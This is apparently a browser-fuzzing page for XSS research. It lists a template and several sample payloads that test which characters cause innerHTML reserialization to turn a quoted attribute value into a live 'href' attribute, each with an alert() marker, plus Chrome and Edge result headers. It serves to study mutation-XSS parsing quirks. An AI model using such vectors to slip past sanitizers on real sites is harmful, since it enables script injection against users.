masato - braves parsing finding valid characters


Trying to see what cahracters are allowed
Created by: InsertScript
Created on: Sunday, August 3, 2025 at 9:17:09 AM
Updated on: Sunday, August 3, 2025 at 9:17:09 AM
Vector type: XSS
Vector charset: UTF-8
Template used:
<div id="x$[i]"><span x="href=$[chr]>&bbb"></span></div>
<script>
window["x$[i]"].innerHTML=window["x$[i]"].innerHTML;
if (window["x$[i]"].firstChild.getAttribute("href") != null)
{
log($[i])
}
</script>
Your browser was detected as:
Detecting... Detecting... Detecting... Detecting...
Sample payloads
<div id="x9"><span x="href= >&bbb"></span></div>
<script>
window["x9"].innerHTML=window["x9"].innerHTML;
if (window["x9"].firstChild.getAttribute("href") != null)
{
alert(9)
}
</script>
<div id="x10"><span x="href=
>&bbb"></span></div>
<script>
window["x10"].innerHTML=window["x10"].innerHTML;
if (window["x10"].firstChild.getAttribute("href") != null)
{
alert(10)
}
</script>
<div id="x12"><span x="href=>&bbb"></span></div>
<script>
window["x12"].innerHTML=window["x12"].innerHTML;
if (window["x12"].firstChild.getAttribute("href") != null)
{
alert(12)
}
</script>
<div id="x13"><span x="href=
>&bbb"></span></div>
<script>
window["x13"].innerHTML=window["x13"].innerHTML;
if (window["x13"].firstChild.getAttribute("href") != null)
{
alert(13)
}
</script>
<div id="x32"><span x="href= >&bbb"></span></div>
<script>
window["x32"].innerHTML=window["x32"].innerHTML;
if (window["x32"].firstChild.getAttribute("href") != null)
{
alert(32)
}
</script>
<div id="x45"><span x="href=->&bbb"></span></div>
<script>
window["x45"].innerHTML=window["x45"].innerHTML;
if (window["x45"].firstChild.getAttribute("href") != null)
{
alert(45)
}
</script>
<div id="x48"><span x="href=0>&bbb"></span></div>
<script>
window["x48"].innerHTML=window["x48"].innerHTML;
if (window["x48"].firstChild.getAttribute("href") != null)
{
alert(48)
}
</script>
<div id="x49"><span x="href=1>&bbb"></span></div>
<script>
window["x49"].innerHTML=window["x49"].innerHTML;
if (window["x49"].firstChild.getAttribute("href") != null)
{
alert(49)
}
</script>
<div id="x50"><span x="href=2>&bbb"></span></div>
<script>
window["x50"].innerHTML=window["x50"].innerHTML;
if (window["x50"].firstChild.getAttribute("href") != null)
{
alert(50)
}
</script>
<div id="x51"><span x="href=3>&bbb"></span></div>
<script>
window["x51"].innerHTML=window["x51"].innerHTML;
if (window["x51"].firstChild.getAttribute("href") != null)
{
alert(51)
}
</script>
<div id="x52"><span x="href=4>&bbb"></span></div>
<script>
window["x52"].innerHTML=window["x52"].innerHTML;
if (window["x52"].firstChild.getAttribute("href") != null)
{
alert(52)
}
</script>
<div id="x53"><span x="href=5>&bbb"></span></div>
<script>
window["x53"].innerHTML=window["x53"].innerHTML;
if (window["x53"].firstChild.getAttribute("href") != null)
{
alert(53)
}
</script>
<div id="x54"><span x="href=6>&bbb"></span></div>
<script>
window["x54"].innerHTML=window["x54"].innerHTML;
if (window["x54"].firstChild.getAttribute("href") != null)
{
alert(54)
}
</script>
<div id="x55"><span x="href=7>&bbb"></span></div>
<script>
window["x55"].innerHTML=window["x55"].innerHTML;
if (window["x55"].firstChild.getAttribute("href") != null)
{
alert(55)
}
</script>
<div id="x56"><span x="href=8>&bbb"></span></div>
<script>
window["x56"].innerHTML=window["x56"].innerHTML;
if (window["x56"].firstChild.getAttribute("href") != null)
{
alert(56)
}
</script>
<div id="x57"><span x="href=9>&bbb"></span></div>
<script>
window["x57"].innerHTML=window["x57"].innerHTML;
if (window["x57"].firstChild.getAttribute("href") != null)
{
alert(57)
}
</script>
<div id="x62"><span x="href=>>&bbb"></span></div>
<script>
window["x62"].innerHTML=window["x62"].innerHTML;
if (window["x62"].firstChild.getAttribute("href") != null)
{
alert(62)
}
</script>
<div id="x65"><span x="href=A>&bbb"></span></div>
<script>
window["x65"].innerHTML=window["x65"].innerHTML;
if (window["x65"].firstChild.getAttribute("href") != null)
{
alert(65)
}
</script>
<div id="x66"><span x="href=B>&bbb"></span></div>
<script>
window["x66"].innerHTML=window["x66"].innerHTML;
if (window["x66"].firstChild.getAttribute("href") != null)
{
alert(66)
}
</script>
<div id="x67"><span x="href=C>&bbb"></span></div>
<script>
window["x67"].innerHTML=window["x67"].innerHTML;
if (window["x67"].firstChild.getAttribute("href") != null)
{
alert(67)
}
</script>
Fuzz results

Chrome 138.0.0.0 desktop Windows NT 10.0
Updated
Sun Aug 03 2025
Found 70 results
Loading...

Microsoft Edge 138.0.0.0 desktop Windows NT 10.0
Updated
Sun Aug 03 2025
Found 70 results
Loading...